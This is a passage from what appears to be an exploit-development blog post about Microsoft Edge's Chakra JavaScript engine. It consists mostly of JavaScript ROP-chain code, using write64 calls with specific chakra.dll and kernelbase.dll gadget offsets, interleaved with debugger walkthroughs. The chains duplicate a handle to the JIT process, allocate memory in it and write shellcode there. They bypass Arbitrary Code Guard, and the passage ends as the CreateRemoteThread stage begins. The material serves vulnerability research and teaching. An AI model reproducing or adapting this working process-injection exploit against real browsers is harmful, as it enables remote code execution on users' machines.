write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Our ROP chain starts with the following gadget:

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();

This gadget is also used four times before our first gadget within the WriteProcessMemory ROP chain. So, we will re-execute our updated exploit and set a breakpoint on this gadget and hit g in WinDbg five times in order to get to our intended first gadget (four times to “bypass” the other uses, and once more to get to our intended gadget).
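The count of five can be double-checked with a small sketch that lists only the gadget entries from the two earlier stages (data and padding qwords omitted) and counts the uses of pop rcx ; ret. The array and the variable names are assumptions for illustration; the offsets are the chakra.dll-relative ones from the listing above.

```javascript
// Gadget offsets (relative to the chakra.dll base) in execution order.
// Only gadget entries are listed; data values and padding qwords are omitted.
const POP_RCX = 0x46377; // pop rcx ; ret

const priorStages = [
    // DuplicateHandle stage
    0x1d2c9, 0x24628b, 0x577fd4, POP_RCX, 0xf6270, POP_RCX, 0x577fd4, 0x272beb, 0x243949,
    // VirtualAllocEx stage
    0x577fd4, POP_RCX, 0xf6270, 0x1d2c9, 0x24628b, 0x1d2c9, POP_RCX, 0xd2125, 0x577fd4, 0x272beb, 0x243949,
];

// Each earlier use trips the breakpoint once before the WriteProcessMemory stage is reached.
const earlierHits = priorStages.filter((gadget) => gadget === POP_RCX).length;
const timesToPressG = earlierHits + 1;

console.log(earlierHits, timesToPressG); // 4 5
```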

Our first ROP sequence in our case is not going to actually involve WriteProcessMemory. Instead, we are going to store our VirtualAllocEx allocation (which should still be in RAX, as our previous ROP chain called VirtualAllocEx, which places the address of the allocation in RAX) in a “permanent” location within the .data section of kernelbase.dll. Think of this as we are storing the allocation returned from VirtualAllocEx in a “global variable” (of sorts):

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

At this point we have achieved persistent storage of where we would like to write our shellcode (the value returned from VirtualAllocEx). We will be using RAX in our ROP chain for WriteProcessMemory, so we persistently store this value to avoid “clobbering” it with our ROP chain. Having said that, our first item on the WriteProcessMemory docket is to place the size of our write operation (~ sizeof(shellcode), of 0x1000 bytes) into R9 as the nSize argument.

We start this process, of which there are many examples in this blog post, by placing a writable address in RAX which we do not care about, to grant us access to the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret gadget. This allows us to place our intended value of 0x1000 into R9.
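Gadgets such as this one end in add rsp, N ; ret, so each use must be followed by N / 8 qwords of padding before the next gadget address. A tiny sketch of that arithmetic is below; the `paddingQwords` helper is a hypothetical name, not something from the exploit.

```javascript
// Number of 8-byte padding entries needed after a gadget ending in "add rsp, N ; ret".
function paddingQwords(addRspBytes) {
    if (addRspBytes % 8 !== 0) {
        throw new RangeError("expected a multiple of 8");
    }
    return addRspBytes / 8;
}

console.log(paddingQwords(0x28)); // 5
console.log(paddingQwords(0x38)); // 7
console.log(paddingQwords(0x48)); // 9
```

These values match the chain above: five 0x41414141 writes follow the mov r9, rcx gadget, and nine follow the mov r8, rdx gadget. For add rsp, 0x38, the seven qwords are the shadow space plus the stack parameters and any trailing padding.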

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	-
	-
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

Next up in our ROP sequence is the hProcess parameter, also known as our PROCESS_ALL_ACCESS handle to the JIT server. We can simply just fetch this from the .data section of chakra.dll, where we stored this value as a result of our DuplicateHandle call.

You’ll notice there is a mov [rax+0x20], rcx write operation that will write the contents of RCX into the memory address, at an offset of 0x20, in RAX. You’ll recall we “prepped” RAX already in this ROP sequence when dealing with the nSize parameter - meaning RAX already has a writable address, and the write operation will not cause an access violation (e.g. writing to a non-writable address).

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	-
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

The next parameter we are going to deal with is lpBaseAddress. In our call to WriteProcessMemory, this is the address within the process denoted by the handle supplied in hProcess (the JIT server process where ACG is disabled). We control a region of one memory page within the JIT process, as a result of our VirtualAllocEx ROP chain. This allocation (which resides in the JIT process) is the address we are going to supply here.

This ROP sequence is slightly convoluted, so I will provide the snippet (which is already above) directly below for continuity/context:

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

We can simply pop the address where we stored the address of our JIT process allocation (via VirtualAllocEx) into the RDX register. However, this is where things get “interesting”. There were no good gadgets within chakra.dll to directly dereference RDX and place the result into RDX (mov rdx, [rdx] ; ret). The only gadget to do so, as we see above, is mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret. This gadget does dereference RDX and store the result in RDX, but not at RDX directly. Instead, it reads the value stored at RDX + 0x8 and places that into RDX. So, we do a bit of math here. If we pop the address of our storage location, minus 0x8, into RDX, then when mov rdx, [rdx+0x8] executes it will take the value in RDX, add 0x8 to it, and dereference the result, storing the contents in RDX. Since -0x8 + 0x8 = 0, the two offsets cancel out, and this “hack”, of sorts, ensures RDX contains the base address of our allocation.
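The store-then-load round trip can be sketched against a toy memory map to confirm that the offsets cancel. All addresses here are made up, and `store` and `loadPlus8` are hypothetical helpers that only mimic the two gadgets.

```javascript
// Toy model: memory is a Map from address to value (BigInt); all addresses are made up.
const mem = new Map();
const STORAGE = 0x5000n;      // hypothetical stand-in for the kernelbase.dll .data slot
const ALLOCATION = 0x1a0000n; // hypothetical stand-in for the VirtualAllocEx return value

// mov qword [rcx], rax  (save the allocation address for later)
function store(regs) {
    mem.set(regs.rcx, regs.rax);
}

// mov rdx, qword [rdx+0x08] ; mov rax, rdx
function loadPlus8(regs) {
    regs.rdx = mem.get(regs.rdx + 0x8n);
    regs.rax = regs.rdx;
}

const regs = { rax: ALLOCATION, rcx: STORAGE, rdx: 0n };
store(regs);

regs.rdx = STORAGE - 0x8n; // pop rdx with (slot address - 0x8)
loadPlus8(regs);           // reads [slot - 0x8 + 0x8] == [slot]

console.log(regs.rdx === ALLOCATION); // true
```

Note that the gadget also overwrites RAX with the same value. That is harmless here, since RAX is reloaded before the jump into WriteProcessMemory.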

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

Now, our next item is to knock out the lpBuffer parameter. This is the easiest of our parameters, as we have already stored the shellcode we want to copy into the remote JIT process in the .data section of chakra.dll (see “Shellcode” section of this blog post).

Our call is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode),				// Size of our shellcode
	NULL 						// Optional
);

The last items on the agenda are to load kernelbase!WriteProcessMemory into RAX and jmp to it, and also write our last parameter to the stack at RSP + 0x28 (NULL/0 value).

Now, before we hit the jmp rax instruction to jump into our call to WriteProcessMemory, let’s attach another WinDbg debugger to the JIT process and examine the lpBaseAddress parameter.

We can see our allocation is valid, but is not set to any value. Let’s hit t in the content process WinDbg session and then pt to execute the call to WriteProcessMemory, but pausing before we return from the function call.

Now, let’s go back to the JIT process WinDbg session and re-examine the contents of the allocation.

As we can see, we have our shellcode mapped into the JIT process. All there is left now (which is a slight misnomer, as it is several more chained ROP chains) is to force the JIT process to mark this code as RWX, and execute it.

CreateRemoteThread ROP Chain

We now have a remote allocation within the JIT process, which we have written our shellcode to. As mentioned, we now need a way to execute this shellcode. As you may or may not know, on Windows threads are what are responsible for executing code (not a process itself, which can be thought of as a “container of resources”). What we are going to do now is create a thread within the JIT process, but we are going to create this thread in a suspended manner. As we know, our shellcode is sitting in a readable and writable page. We first need to mark this page as RWX, which we will do in the later portions of this blog. So, for now, we will create the thread which will be responsible for executing our shellcode in the future - but we are going to create it in a suspended state and reconcile execution later. CreateRemoteThread is a Windows API which allows a user to create a thread in a remote process. This will allow us to create a thread within the JIT process, from our current content process. Here is how our call will be set up:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)
);

This call requires almost everything to be set to NULL or 0, with the exception of two parameters. We are creating our thread in a suspended state to ensure execution doesn’t occur until we explicitly resume the thread. This is because we still need to overwrite the RSP register of this thread with our final-stage ROP chain, before the ret occurs. Since we are setting the lpStartAddress parameter to the address of a ROP gadget, this effectively is the entry point for this newly-created thread and it should be the function called. Since it is a ROP gadget that performs ret, execution should just return to the stack. So, when we eventually resume this thread, our thread (which is executing in the remote JIT process, where ACG is disabled) will return to whatever is located on the stack, which is where we will eventually point RSP at our final-stage ROP chain.
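Since CreateRemoteThread takes seven parameters, three of them have to be written to the stack rather than loaded into registers. The sketch below maps each parameter to its location under the same convention used for the earlier chains: the first four go in RCX, RDX, R8 and R9, and the rest start at RSP + 0x28 relative to RSP on entry to the API. The `argLocations` helper is hypothetical; the parameter names are the documented ones.

```javascript
// First four integer/pointer arguments go in registers under the x64 calling convention.
const ARG_REGISTERS = ["RCX", "RDX", "R8", "R9"];

// Map each parameter to a register, or to a stack offset relative to RSP on entry
// (return-address slot at RSP, then 0x20 bytes of shadow space, then stack parameters).
function argLocations(params) {
    return params.map((name, i) => ({
        name,
        where: i < 4 ? ARG_REGISTERS[i] : "RSP+0x" + (0x28 + (i - 4) * 8).toString(16),
    }));
}

const createRemoteThreadArgs = argLocations([
    "hProcess",
    "lpThreadAttributes",
    "dwStackSize",
    "lpStartAddress",
    "lpParameter",
    "dwCreationFlags",
    "lpThreadId",
]);

for (const { name, where } of createRemoteThreadArgs) {
    console.log(where.padEnd(9) + name);
}
```

Under this mapping the ret gadget address (lpStartAddress) goes in R9, and the CREATE_SUSPENDED flag (dwCreationFlags) is written at RSP + 0x30.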

Here is how this looks in ROP form (with all previous ROP chains added for context):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager::s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
